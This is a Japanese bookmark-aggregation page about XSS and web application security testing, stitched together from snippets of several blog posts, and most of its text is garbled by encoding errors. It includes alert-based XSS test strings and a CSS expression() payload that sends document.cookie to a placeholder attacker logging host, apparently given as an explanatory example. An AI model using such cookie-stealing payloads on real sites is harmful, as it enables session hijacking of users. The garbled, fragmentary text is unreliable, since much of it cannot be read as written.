2006å¹´12æ02æ¥04:30 ã«ãã´ãªLightweight Languages Error Messageã«ãããæãã·ã³ãã«ãªXSSåé¿æ³ 404 Blog Not Found:perl+javascript - ã¯ã¦ãã¨ç縮URLã®Mashupã®ãã°ãã£ãã¯ã¹ã æè¡ã¡ã¢å¸³ - dankogaiããã®ã¢ããªã®XSS ã¨ã©ã¼ã¡ãã»ã¼ã¸ãåºåããã¨ãã« HTMLã¨ã¹ã±ã¼ããããã¦ãªãã£ãã è¦è½ã¨ãã¨ããã ã£ããããããå ´åã¯ãTBãªããCommentãªã©ãå è¨äºããç´æ¥è¦ããå½¢ã§å ±åãã¦æ¬²ããã ããããtext/htmlã¨ãã¦è§£éããã¦ããã®ã¯ããããã¨æã£ã¦headerãè¦ããã % HEAD 'http://u.dan.co.jp/r.cgi/<script>alert('easy%20xss');</script>' 500 Internal Server Error Co
ææã§ãæå 容ãIPAã«å ±åãã¦ãä»æ¥ä¿®æ£å®äºã¨å¸°ã£ã¦ããã®ã§ããã»ã»ã» ã½ã¼ã¹è¦ãããJavascriptã§XSS対çãã¦ãã¾ããï¼ããã®ãï¼ï¼ input1 = input1.replace("<", "<");
æµè¡ãè¦ç´ ãèãã¦ã¿ã å³â¦çå£ãè¾å£ãè¦å³ãæ¨å³ãã»èªåä¸äººã§ã¯åãããªã æ¥å®¢â¦ã³ã¡ã³ãæ¬ããã©ãæ¬ããªãããã°ã¯ç«GUIèéº¦å± ç«å°â¦âÃãã¥ã¼ã¹ãµã¤ãããå¾æ1ã¯ãªãã¯ã®ç©ä»¶ã§ã å¤æ®µâ¦èªãã®ã«æããæéï¼å°é家ã®ããã°ã»ã©é«ã æ é¤â¦æ å ±ä¾¡å¤ã»æ é¤éå¤ãããã¯ããã§å¥åº·ã«æªã 鮮度â¦çç©ï¼æäºï¼ã¯è³å³æéä»ãã»å å·¥é£åã¯æ㤠å è£ â¦CSSãããã°ãã¼ããã¤ã©ã¹ããåç»ãFLASHã ãã§ã¼ã³ç³»ã»ç¹æ¨©éç´ãã大è¡ï¼è¡æï¼ã¾ã§ é«ç´ã¬ã¹ãã©ã³ ä¼æ¥ã»æå人ããã°ãã³ã¡ã³ãæ¬ã¯ãã¯ã¿ã¤çç¨ã§ããåºé·ãå¼ã¹ã ãã¡ããªã¼ã¬ã¹ãã©ã³ ã¯ã¦ã人æ°ã¨ã³ããªãããããã¬ã¼ã®ç»ç«éãããã¤ã¿ã¦ãGIGAZINEã ãã¡ã¼ã¹ããã¼ã ã¯ã¦ã注ç®ã¨ã³ããªãã¯ã¦ãã§ã¯ã¦ãè«ããéã¢ãã®ã¹ãã¤ã«ï¿¥0ã çä¸¼å± ï¼ã¡ããããããããªäºãã1ãããåã®å¨æ¿ãééããã¾ããã ã©ã¼ã¡ã³ SNSãç ã¿ä»ãã«ãªãã
ããã«ã¡ã¯ï¼ããã¾ãã¨ï¼ ãã¹ãçªé·ã§ãã å æ¥ããµãããã«æãã¦ããã£ãã®ã§ããã ãããªã¦ã§ãã¢ããªã±ã¼ã·ã§ã³ç¨ã®ãã§ãã¯ã·ã¼ããããããã§ãã SECGURU: Web Application Testing cheatsheet ãªããªãé¢ç½ãã®ã§ã軽ãæ¥æ¬èªã«ãã¦ã¿ã¾ãããï¼Special thanks to: ã¸ã¥ã³ã¤ããï¼ â»ééã£ã¦ããããããªãããã 1. ã¢ããªã±ã¼ã·ã§ã³åã¨ãã¼ã¸ã§ã³ 2. ã³ã³ãã¼ãã³ãå 3. éä¿¡ãããã³ã«ãSSLãªãã°ãã¼ã¸ã§ã³ã¨æå·æ¹å¼ 4. ãã©ã¡ã¼ã¿ã¼ã®ãã§ãã¯ãªã¹ã URLãªã¯ã¨ã¹ã URLã¨ã³ã³ã¼ãã£ã³ã° ã¯ã¨ãªã¹ããªã³ã° ãããã¼ ã¯ããã¼ ãã©ã¼ã ãã©ã¼ã ï¼Hiddenï¼ ã¯ã©ã¤ã¢ã³ããµã¤ãã®ã´ã¡ãªãã¼ã·ã§ã³ãã§ã㯠使ç¨ãã¦ããªãä½è¨ãªãã©ã¡ã¼ã¿ã®åå¨ æååé·ã®æ大/æå°å¤ é£çµããã³ãã³ãï¼Concatenate
ããã«ã¡ã¯ããã«ã¡ã¯ï¼ï¼ ã¯ãã¹ãµã¤ãã¹ã¯ãªããã£ã³ã°ã®æéã§ãï¼ XSSã¨ããã¨â¦ï¼ ã¾ã£ããã«æãã¤ãã®ããå ¥åãã¼ã¿éä¿¡ â 確èªè¡¨ç¤ºã®é¨åã§ã®ç¡å®³åæ¼ãã§ãããï¼ ãã¨ãã°ãããªæãã®ãã©ã¼ã ããåãåã£ããã©ã¡ã¼ã¿ãã 確èªã¨ãã¦è¡¨ç¤ºãããã¼ã¸ã¨ãï¼ (å ¥å) <form action="register.cgi" method="post"> ã¿ã¤ãã«ï¼<input type="text" name="title"> â ãã¼ãã¯ã¾ã¡ã¡ããï¼ããå ¥å æ¬æï¼<input type="text" name="body"> â ãããã«ã¡ã¯ããã«ã¡ã¯ï¼ï¼<script>alert(1)</script>ããå ¥å </form> (確èª) <p>ãã®å 容ã§ç»é²ãã¦ããï¼</p> <p> ã¿ã¤ãã«ï¼ ã¼ãã¯ã¾ã¡ã¡ããï¼<br> æ¬æï¼ ããã«ã¡ã¯ããã«ã¡ã¯ï¼ï¼<script>alert
Mozilla Foundationã¯ç±³å½æé7æ26æ¥ï¼Webãã©ã¦ã¶ãFirefoxãã«ã»ãã¥ãªãã£ã»ãã¼ã«ãè¦ã¤ãã£ããã¨ãæããã«ããã¨ã¨ãã«ï¼ã»ãã¥ãªãã£ã»ãã¼ã«ãä¿®æ£ãããã¼ã¸ã§ã³1.5.0.5ããªãªã¼ã¹ãããç´°å·¥ãæ½ãããWebãã¼ã¸ã«ã¢ã¯ã»ã¹ããã ãã§ä»»æã®ããã°ã©ã ãå®è¡ãããå±éºãªã»ãã¥ãªãã£ã»ãã¼ã«ãå«ã¾ããããã®ããMozilla Foundationã§ã¯ï¼ãã¹ã¦ã®Firefoxã¦ã¼ã¶ã¼ã«å¯¾ãã¦ã¢ããã°ã¬ã¼ããããã¨ãå§ãã¦ãããæ¥æ¬èªçãå«ãåå½èªçã®1.5.0.5ããªãªã¼ã¹ããã¦ããã ææ°çã®1.5.0.5ã§ä¿®æ£ãããã®ã¯ï¼ä»¥ä¸ã®12件ã®ã»ãã¥ãªãã£ã»ãã¼ã«ããã®ãã¡ï¼ãMFSA 2006-55ããMFSA 2006-51ããMFSA 2006-50ããMFSA 2006-48ããMFSA 2006-46ããMFSA 2006-45ããMFSA 2006-44
<html> <body> <style type="text/css"> h1 { background#:/*;*/ expression('url(http://commonevillogger.example.com/log.php'+document.cookie+')'); } </style> <h1>heading</h1> </body> </html>ä¸è¨ã¯Cookieãæªæãããµã¤ãã«é£ã°ãä¾ã§ããIEã®ã¿å¯¾å¿ã ï¼ã¡ãªã¿ã«ãexpressionã使ã£ã¦ãã¦ãcommonevillogger.example.comã«ã¯ãCookieãï¼åããé£ã³ã¾ãããå人çã«ã¯æå¤ãªæãã§ããexpressionã使ã£ã¦alertãããããã¨ãã©ã¯ã©ã£ã½ããªã£ããããããã¯ããªãã¼ããä»è¾¼ãã§ãµã¼ãã«è² è·ãããã£ã¡ãã£ãäºæ ã¨ããç¥ã£ã¦ããããã§ããAutoF5æ»æã¿ãããªãï¼ é
ãªãªã¼ã¹ãé害æ å ±ãªã©ã®ãµã¼ãã¹ã®ãç¥ãã
ææ°ã®äººæ°ã¨ã³ããªã¼ã®é ä¿¡
å¦çãå®è¡ä¸ã§ã
j次ã®ããã¯ãã¼ã¯
kåã®ããã¯ãã¼ã¯
lãã¨ã§èªã
eã³ã¡ã³ãä¸è¦§ãéã
oãã¼ã¸ãéã
{{#tags}}- {{label}}
{{/tags}}